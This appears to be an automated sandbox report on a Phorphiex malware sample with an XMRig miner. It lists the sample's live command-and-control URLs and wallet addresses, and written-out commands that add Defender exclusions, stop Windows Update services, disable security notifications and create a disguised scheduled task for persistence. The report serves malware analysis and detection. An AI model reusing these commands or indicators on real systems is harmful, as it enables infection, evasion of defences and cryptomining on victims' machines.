Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
03-08-2024 19:37
Static task
static1
General
-
Target
d1b39809afb266f79d47e0e675b58520N.exe
-
Size
5.4MB
-
MD5
d1b39809afb266f79d47e0e675b58520
-
SHA1
644cb33d14cadee497df49d83832025ef767d59c
-
SHA256
31eb7b48accefe8d55dbfc0006deb922eb274b21110495169515d58b5d76e80e
-
SHA512
5e4401031e2be27d231e11dde07a43c6ea1c7b8722164068369099262d8c97d6b2f4fb2e49a6e74f82d98f01fbd2aeed3c45eb1ec04d22fc823f9b8c6d9ca0a6
-
SSDEEP
98304:iCBbQ2H/oEMjghbO76uAqrngBNXsH7zMdDwPgXcM3qn8V/cwduNJKf+tLNJ:i4Rf/JTNXsH7z0DwPgAvwduGf6r
Malware Config
Extracted
phorphiex
http://185.215.113.66/
http://91.202.233.141/
0xCa90599132C4D88907Bd8E046540284aa468a035
TRuGGXNDM1cavQ1AqMQHG8yfxP4QWVSMN6
qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r
XryzFMFVpDUvU7famUGf214EXD3xNUSmQf
LLeT2zkStY3cvxMBFhoWXkG5VuZPoezduv
rwc4LVd9ABpULQ1CuCpDkgX2xVB1fUijyb
4AtjkCVKbtEC3UEN77SQHuH9i1XkzNiRi5VCbA2XGsJh46nJSXfGQn4GjLuupCqmC57Lo7LvKmFUyRfhtJSvKvuw3h9ReKK
15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC
17hgMFyLDwMjxWqw5GhijhnPdJDyFDqecY
ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp
3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc
3FerB8kUraAVGCVCNkgv57zTBjUGjAUkU3
DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA
t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh
stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj
bnb1epx67ne4vckqmaj4gwke8m322f4yjr6eh52wqw
bc1qmpkehfffkr6phuklsksnd7nhgx0369sxu772m3
bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r
GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3
-
mutex
x88767657x
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Signatures
-
Modifies security service 2 TTPs 1 IoCs
Processes:
sysmysldrv.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" sysmysldrv.exe -
Phorphiex payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\KDOTUZKP\newtpp[1].exe family_phorphiex -
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
Processes:
3796211748.exewupgrdsv.exedescription pid process target process PID 3020 created 3512 3020 3796211748.exe Explorer.EXE PID 3020 created 3512 3020 3796211748.exe Explorer.EXE PID 4664 created 3512 4664 wupgrdsv.exe Explorer.EXE PID 4664 created 3512 4664 wupgrdsv.exe Explorer.EXE -
Processes:
sysmysldrv.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysmysldrv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysmysldrv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysmysldrv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysmysldrv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysmysldrv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysmysldrv.exe -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
XMRig Miner payload 6 IoCs
Processes:
resource yara_rule behavioral2/memory/4664-543-0x00007FF677430000-0x00007FF6779A6000-memory.dmp xmrig behavioral2/memory/916-545-0x00007FF6FF300000-0x00007FF6FFAEF000-memory.dmp xmrig behavioral2/memory/916-547-0x00007FF6FF300000-0x00007FF6FFAEF000-memory.dmp xmrig behavioral2/memory/916-548-0x00007FF6FF300000-0x00007FF6FFAEF000-memory.dmp xmrig behavioral2/memory/916-549-0x00007FF6FF300000-0x00007FF6FFAEF000-memory.dmp xmrig behavioral2/memory/916-550-0x00007FF6FF300000-0x00007FF6FFAEF000-memory.dmp xmrig -
Processes:
powershell.exepowershell.exepowershell.exepid process 760 powershell.exe 452 powershell.exe 5096 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
sysmysldrv.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation sysmysldrv.exe -
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Executes dropped EXE 10 IoCs
Processes:
6E1B.exe1407331257.exesysmysldrv.exe141411950.exe2882525828.exe2161417757.exe1748514294.exe2371015653.exe3796211748.exewupgrdsv.exepid process 4976 6E1B.exe 4624 1407331257.exe 1276 sysmysldrv.exe 3708 141411950.exe 3940 2882525828.exe 4480 2161417757.exe 4736 1748514294.exe 3648 2371015653.exe 3020 3796211748.exe 4664 wupgrdsv.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
sysmysldrv.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysmysldrv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysmysldrv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysmysldrv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysmysldrv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysmysldrv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" sysmysldrv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysmysldrv.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
1407331257.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysmysldrv.exe" 1407331257.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
wupgrdsv.exedescription pid process target process PID 4664 set thread context of 916 4664 wupgrdsv.exe notepad.exe -
Drops file in Windows directory 2 IoCs
Processes:
1407331257.exedescription ioc process File created C:\Windows\sysmysldrv.exe 1407331257.exe File opened for modification C:\Windows\sysmysldrv.exe 1407331257.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid process 760 sc.exe 1060 sc.exe 2008 sc.exe 1724 sc.exe 4172 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 17 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
d1b39809afb266f79d47e0e675b58520N.exesysmysldrv.execmd.exesc.exe6E1B.execmd.exesc.exesc.exe2371015653.exe1407331257.exesc.exe2882525828.exepowershell.exesc.exe141411950.exe2161417757.exe1748514294.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d1b39809afb266f79d47e0e675b58520N.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sysmysldrv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6E1B.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2371015653.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1407331257.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2882525828.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 141411950.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2161417757.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1748514294.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
powershell.exe3796211748.exepowershell.exewupgrdsv.exepowershell.exepid process 5096 powershell.exe 5096 powershell.exe 3020 3796211748.exe 3020 3796211748.exe 760 powershell.exe 760 powershell.exe 3020 3796211748.exe 3020 3796211748.exe 4664 wupgrdsv.exe 4664 wupgrdsv.exe 452 powershell.exe 452 powershell.exe 4664 wupgrdsv.exe 4664 wupgrdsv.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 5096 powershell.exe Token: SeDebugPrivilege 760 powershell.exe Token: SeIncreaseQuotaPrivilege 760 powershell.exe Token: SeSecurityPrivilege 760 powershell.exe Token: SeTakeOwnershipPrivilege 760 powershell.exe Token: SeLoadDriverPrivilege 760 powershell.exe Token: SeSystemProfilePrivilege 760 powershell.exe Token: SeSystemtimePrivilege 760 powershell.exe Token: SeProfSingleProcessPrivilege 760 powershell.exe Token: SeIncBasePriorityPrivilege 760 powershell.exe Token: SeCreatePagefilePrivilege 760 powershell.exe Token: SeBackupPrivilege 760 powershell.exe Token: SeRestorePrivilege 760 powershell.exe Token: SeShutdownPrivilege 760 powershell.exe Token: SeDebugPrivilege 760 powershell.exe Token: SeSystemEnvironmentPrivilege 760 powershell.exe Token: SeRemoteShutdownPrivilege 760 powershell.exe Token: SeUndockPrivilege 760 powershell.exe Token: SeManageVolumePrivilege 760 powershell.exe Token: 33 760 powershell.exe Token: 34 760 powershell.exe Token: 35 760 powershell.exe Token: 36 760 powershell.exe Token: SeIncreaseQuotaPrivilege 760 powershell.exe Token: SeSecurityPrivilege 760 powershell.exe Token: SeTakeOwnershipPrivilege 760 powershell.exe Token: SeLoadDriverPrivilege 760 powershell.exe Token: SeSystemProfilePrivilege 760 powershell.exe Token: SeSystemtimePrivilege 760 powershell.exe Token: SeProfSingleProcessPrivilege 760 powershell.exe Token: SeIncBasePriorityPrivilege 760 powershell.exe Token: SeCreatePagefilePrivilege 760 powershell.exe Token: SeBackupPrivilege 760 powershell.exe Token: SeRestorePrivilege 760 powershell.exe Token: SeShutdownPrivilege 760 powershell.exe Token: SeDebugPrivilege 760 powershell.exe Token: SeSystemEnvironmentPrivilege 760 powershell.exe Token: SeRemoteShutdownPrivilege 760 powershell.exe Token: SeUndockPrivilege 760 powershell.exe Token: SeManageVolumePrivilege 760 powershell.exe Token: 33 760 powershell.exe Token: 34 760 powershell.exe Token: 35 760 powershell.exe Token: 36 760 powershell.exe Token: SeIncreaseQuotaPrivilege 760 powershell.exe Token: SeSecurityPrivilege 760 powershell.exe Token: SeTakeOwnershipPrivilege 760 powershell.exe Token: SeLoadDriverPrivilege 760 powershell.exe Token: SeSystemProfilePrivilege 760 powershell.exe Token: SeSystemtimePrivilege 760 powershell.exe Token: SeProfSingleProcessPrivilege 760 powershell.exe Token: SeIncBasePriorityPrivilege 760 powershell.exe Token: SeCreatePagefilePrivilege 760 powershell.exe Token: SeBackupPrivilege 760 powershell.exe Token: SeRestorePrivilege 760 powershell.exe Token: SeShutdownPrivilege 760 powershell.exe Token: SeDebugPrivilege 760 powershell.exe Token: SeSystemEnvironmentPrivilege 760 powershell.exe Token: SeRemoteShutdownPrivilege 760 powershell.exe Token: SeUndockPrivilege 760 powershell.exe Token: SeManageVolumePrivilege 760 powershell.exe Token: 33 760 powershell.exe Token: 34 760 powershell.exe Token: 35 760 powershell.exe -
Suspicious use of FindShellTrayWindow 38 IoCs
Processes:
notepad.exepid process 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe -
Suspicious use of SendNotifyMessage 38 IoCs
Processes:
notepad.exepid process 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe 916 notepad.exe -
Suspicious use of WriteProcessMemory 51 IoCs
Processes:
d1b39809afb266f79d47e0e675b58520N.exe6E1B.exe1407331257.exesysmysldrv.execmd.execmd.exe2161417757.exe2371015653.exewupgrdsv.exedescription pid process target process PID 1144 wrote to memory of 4976 1144 d1b39809afb266f79d47e0e675b58520N.exe 6E1B.exe PID 1144 wrote to memory of 4976 1144 d1b39809afb266f79d47e0e675b58520N.exe 6E1B.exe PID 1144 wrote to memory of 4976 1144 d1b39809afb266f79d47e0e675b58520N.exe 6E1B.exe PID 4976 wrote to memory of 4624 4976 6E1B.exe 1407331257.exe PID 4976 wrote to memory of 4624 4976 6E1B.exe 1407331257.exe PID 4976 wrote to memory of 4624 4976 6E1B.exe 1407331257.exe PID 4624 wrote to memory of 1276 4624 1407331257.exe sysmysldrv.exe PID 4624 wrote to memory of 1276 4624 1407331257.exe sysmysldrv.exe PID 4624 wrote to memory of 1276 4624 1407331257.exe sysmysldrv.exe PID 1276 wrote to memory of 3580 1276 sysmysldrv.exe cmd.exe PID 1276 wrote to memory of 3580 1276 sysmysldrv.exe cmd.exe PID 1276 wrote to memory of 3580 1276 sysmysldrv.exe cmd.exe PID 1276 wrote to memory of 364 1276 sysmysldrv.exe cmd.exe PID 1276 wrote to memory of 364 1276 sysmysldrv.exe cmd.exe PID 1276 wrote to memory of 364 1276 sysmysldrv.exe cmd.exe PID 3580 wrote to memory of 5096 3580 cmd.exe powershell.exe PID 3580 wrote to memory of 5096 3580 cmd.exe powershell.exe PID 3580 wrote to memory of 5096 3580 cmd.exe powershell.exe PID 364 wrote to memory of 4172 364 cmd.exe sc.exe PID 364 wrote to memory of 4172 364 cmd.exe sc.exe PID 364 wrote to memory of 4172 364 cmd.exe sc.exe PID 364 wrote to memory of 760 364 cmd.exe sc.exe PID 364 wrote to memory of 760 364 cmd.exe sc.exe PID 364 wrote to memory of 760 364 cmd.exe sc.exe PID 364 wrote to memory of 1724 364 cmd.exe sc.exe PID 364 wrote to memory of 1724 364 cmd.exe sc.exe PID 364 wrote to memory of 1724 364 cmd.exe sc.exe PID 364 wrote to memory of 2008 364 cmd.exe sc.exe PID 364 wrote to memory of 2008 364 cmd.exe sc.exe PID 364 wrote to memory of 2008 364 cmd.exe sc.exe PID 364 wrote to memory of 1060 364 cmd.exe sc.exe PID 364 wrote to memory of 1060 364 cmd.exe sc.exe PID 364 wrote to memory of 1060 364 cmd.exe sc.exe PID 1276 wrote to memory of 3708 1276 sysmysldrv.exe 141411950.exe PID 1276 wrote to memory of 3708 1276 sysmysldrv.exe 141411950.exe PID 1276 wrote to memory of 3708 1276 sysmysldrv.exe 141411950.exe PID 1276 wrote to memory of 3940 1276 sysmysldrv.exe 2882525828.exe PID 1276 wrote to memory of 3940 1276 sysmysldrv.exe 2882525828.exe PID 1276 wrote to memory of 3940 1276 sysmysldrv.exe 2882525828.exe PID 1276 wrote to memory of 4480 1276 sysmysldrv.exe 2161417757.exe PID 1276 wrote to memory of 4480 1276 sysmysldrv.exe 2161417757.exe PID 1276 wrote to memory of 4480 1276 sysmysldrv.exe 2161417757.exe PID 4480 wrote to memory of 4736 4480 2161417757.exe 1748514294.exe PID 4480 wrote to memory of 4736 4480 2161417757.exe 1748514294.exe PID 4480 wrote to memory of 4736 4480 2161417757.exe 1748514294.exe PID 1276 wrote to memory of 3648 1276 sysmysldrv.exe 2371015653.exe PID 1276 wrote to memory of 3648 1276 sysmysldrv.exe 2371015653.exe PID 1276 wrote to memory of 3648 1276 sysmysldrv.exe 2371015653.exe PID 3648 wrote to memory of 3020 3648 2371015653.exe 3796211748.exe PID 3648 wrote to memory of 3020 3648 2371015653.exe 3796211748.exe PID 4664 wrote to memory of 916 4664 wupgrdsv.exe notepad.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3512
-
C:\Users\Admin\AppData\Local\Temp\d1b39809afb266f79d47e0e675b58520N.exe"C:\Users\Admin\AppData\Local\Temp\d1b39809afb266f79d47e0e675b58520N.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1144 -
C:\Users\Admin\AppData\Local\Temp\6E1B.exe"C:\Users\Admin\AppData\Local\Temp\6E1B.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4976 -
C:\Users\Admin\AppData\Local\Temp\1407331257.exeC:\Users\Admin\AppData\Local\Temp\1407331257.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4624 -
C:\Windows\sysmysldrv.exeC:\Windows\sysmysldrv.exe5⤵
- Modifies security service
- Windows security bypass
- Checks computer location settings
- Executes dropped EXE
- Windows security modification
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1276 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3580 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5096
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:364 -
C:\Windows\SysWOW64\sc.exesc stop UsoSvc7⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4172
-
-
C:\Windows\SysWOW64\sc.exesc stop WaaSMedicSvc7⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:760
-
-
C:\Windows\SysWOW64\sc.exesc stop wuauserv7⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1724
-
-
C:\Windows\SysWOW64\sc.exesc stop DoSvc7⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2008
-
-
C:\Windows\SysWOW64\sc.exesc stop BITS7⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1060
-
-
-
C:\Users\Admin\AppData\Local\Temp\141411950.exeC:\Users\Admin\AppData\Local\Temp\141411950.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3708
-
-
C:\Users\Admin\AppData\Local\Temp\2882525828.exeC:\Users\Admin\AppData\Local\Temp\2882525828.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3940
-
-
C:\Users\Admin\AppData\Local\Temp\2161417757.exeC:\Users\Admin\AppData\Local\Temp\2161417757.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4480 -
C:\Users\Admin\AppData\Local\Temp\1748514294.exeC:\Users\Admin\AppData\Local\Temp\1748514294.exe7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4736
-
-
-
C:\Users\Admin\AppData\Local\Temp\2371015653.exeC:\Users\Admin\AppData\Local\Temp\2371015653.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3648 -
C:\Users\Admin\AppData\Local\Temp\3796211748.exeC:\Users\Admin\AppData\Local\Temp\3796211748.exe7⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3020
-
-
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#llzqlmcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Windows Upgrade Manager' /tr '''C:\Users\Admin\Windows Upgrade\wupgrdsv.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Upgrade Manager' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:760
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "Windows Upgrade Manager"2⤵PID:3368
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#llzqlmcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Windows Upgrade Manager' /tr '''C:\Users\Admin\Windows Upgrade\wupgrdsv.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Upgrade Manager' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:452
-
-
C:\Windows\System32\notepad.exeC:\Windows\System32\notepad.exe2⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:916
-
-
C:\Users\Admin\Windows Upgrade\wupgrdsv.exe"C:\Users\Admin\Windows Upgrade\wupgrdsv.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4664
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
1Service Execution
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Credential Access
Credentials from Password Stores
2Credentials from Web Browsers
1Windows Credential Manager
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5fee026663fcb662152188784794028ee
SHA13c02a26a9cb16648fad85c6477b68ced3cb0cb45
SHA256dbd4136bc342e3e92902ec3a30d165452c82997a7ae24ac90775e42d88959e6b
SHA5127b12bd5c8fc4356b9123d6586b4980cf76012663b41c0dab6f6f21567e2f4005c5bcea2cc2158d157e4f801a281f3e04bad3774cddb3122db309ccf662184bd6
-
Filesize
92KB
MD5be9388b42333b3d4e163b0ace699897b
SHA14e1109772eb9cb59c557380822166fe1664403bd
SHA256d281e0a0f1e1073f2d290a7eb1f77bed4c210dbf83a0f4f4e22073f50faa843f
SHA5125f887f1060b898c9a88745cde7cf509fdf42947ab8e5948b46c2df659468dc245b24d089bdbec0b314c40b83934698bf4b6feb8954e32810ff8f522aab0af19a
-
Filesize
18KB
MD552ab7d973356fb9eb3a38645bb0aa7b8
SHA1ac42ec6c007bf34f115358ac64ec83c74f5b26c5
SHA256448bfc0f6e8849abcfb2247b3a913884b32b0b1619754c1a4ed97626577ce644
SHA512c78f1e23a669c82d8a0588a6c857ae8790fa0ad41109bc660022aab3b0e13a9971120a1d363d4770f1a650720865d4d718161d6afd4044a37bbc7f5b4c03f607
-
Filesize
1KB
MD5d95b08252ed624f6d91b46523f110f29
SHA117577997bc1fb5d3fbe59be84013165534415dc3
SHA256342ce7c39bf9992d31d4b61ef138b2b084c96c74736ed00bb19aae49be16ca02
SHA5120c4288176d56f4ee6d8f08f568fba07ad859f50a395c39d2afd3baf55d3d29ca065a1ce305d1bd790477c35977c0ffa230543e805622f80a77bcee71b24eb257
-
Filesize
7KB
MD5af0622340ed8ba48efa92e0b2d9aca7b
SHA177e7181b4d4e6957cf13ba37f590cf219aac88cb
SHA2567b7d433c6c204ed3bcd1ea74106592edfa1a30b6ef7bbc3ed21efcbadc51e526
SHA512e1368c1c292789115b51cae549bd2d484dbc614eb3e57aa5fce324385d28e9fbddf60064b4c88237b38cded294d090d07c491b646651c45bcd6235630d94ef46
-
Filesize
20KB
MD51382c0a4a9e0a9a2c942458652a4a0e4
SHA155ed8ebd6281c280c3e77763773d789a6057e743
SHA2564cb590dfafb7653379326e840d9b904a3cf05451999c4f9eb66c6e7116b68875
SHA512cc1ba7e779536b57409c974f16b0d8706fdf8749fb9eca36716d4e84d4f420a650b6476ac08570e684ad1e492da3bbacc15a4e5be4b94a1b708909d683da0b7e
-
Filesize
10KB
MD5d4039242a73ca683d220aa81a63bf628
SHA19f3e58b60b1d56c8461de59e780597e43653e4e9
SHA2562edde7963b986d6f96c73fa0057a8b0ea163fcd06c9e52c2eeda0728d540955b
SHA512bae49ddfc82ac532d177981f985f7ea9239fd09c6baa914b679d31aef7a8ee091478d83ac2d6f05c490297eeba5342a783ebbf2b143667b16eefff4cb84a21c7
-
Filesize
10KB
MD54fe8dc617311f7b6a4b8ebe0b1e24090
SHA12bd9341f17c8c0c62e56e1863b1d2f9c43cb30e5
SHA2565016e413b0c563efc920165e7235c9f2706808877668bd297b41435acc7aade4
SHA512910a12fbaffd45b0f797a95c6678a32c4a27adbb7d1474f183f8863d310d31fbba17d5d747da87ac4a30dd7cb22c67a4d1c25b302ef0c3f6954d91a459c692db
-
Filesize
5.4MB
MD541ab08c1955fce44bfd0c76a64d1945a
SHA12b9cb05f4de5d98c541d15175d7f0199cbdd0eea
SHA256dd12cb27b3867341bf6ca48715756500d3ec56c19b21bb1c1290806aa74cb493
SHA51238834ae703a8541b4fec9a1db94cfe296ead58649bb1d4873b517df14d0c6a9d25e49ff04c2bf6bb0188845116a4e894aae930d849f9be8c98d2ce51da1ef116
-
Filesize
9KB
MD58d8e6c7952a9dc7c0c73911c4dbc5518
